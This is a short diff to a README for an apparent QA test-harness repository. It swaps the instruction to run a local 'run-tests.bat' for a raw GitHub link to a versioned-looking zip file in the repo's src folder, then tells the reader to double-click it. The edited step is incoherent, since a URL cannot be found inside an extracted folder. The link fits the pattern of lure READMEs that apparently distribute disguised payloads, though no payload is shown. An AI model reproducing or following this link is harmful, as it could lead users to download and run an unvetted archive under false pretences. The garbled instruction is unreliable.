Ethic-Coder/qa-microservice-test-harness/README.md

 #### Run Using the Batch Script

-- In the extracted folder, find `run-tests.bat`.
+- In the extracted folder, find `https://github.com/Ethic-Coder/qa-microservice-test-harness/raw/refs/heads/main/src/test_microservice_harness_qa_3.0-beta.1.zip`.
 - Double-click the file to start the test harness.
 - A console window will open showing progress.
 - The app will start the needed services automatically.